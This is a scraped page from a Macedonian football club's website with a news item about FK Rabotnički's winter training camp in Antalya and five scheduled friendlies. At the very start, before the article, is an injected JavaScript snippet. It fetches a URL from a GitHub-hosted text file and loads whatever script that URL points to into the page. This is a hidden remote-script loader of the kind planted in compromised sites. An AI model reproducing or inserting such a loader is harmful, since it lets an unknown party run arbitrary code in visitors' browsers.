;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Од петок на подготовки во Анталија, договорени пет меѓународни тестови
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Од петок на подготовки во Анталија, договорени пет меѓународни тестови

Работнички ја финализира првата фаза од зимските подготовки која тренерот Томислав Франц и фудбалерите ја реализираа на клупскиот комплекс во Градскиот парк, наменета пред се на подобрување на физичките способности на тимот. Утре е последниот тренинг во Скопје, а в петок експедицијата заминува во турската база Анталија, каде нашиот тим веќе традиционално ја реализира втората фаза од подготовките. Договорени се и пет меѓународни натпревари, како тестови за темпирање на формата пред пролетниот дел од сезоната.

Работнички на 24.јануари ќе одигра пријателски натпревар со Алтин Асир од Туркменистан, два дена подоцна ќе следи проверката на формата против унгарскиот Диосѓер, а на 28.јануари ќе биде одигран тест – меч против Б-тимот на Волфсбург.

За 30.јануари е закажан тестот против романскиот прволигаш Волунтари, а на 2.февруари тимот ќе одигра пријателски натпревар и со чешкиот тим Сигма Оломук.

„Задоволен сум од тоа што досега го реализиравме, утре финишираме со првата фаза, а веќе од петок се селиме во Анталија (Турција) каде ќе продолжиме со подготовките. Таму ќе одиграме пет пријателски натпревари и ќе ја темпираме формата за пролетниот дел од шампионатот. Засега се тече според планот“, истакнува шефот на стручниот штаб, Томислав Франц.

Leave a Reply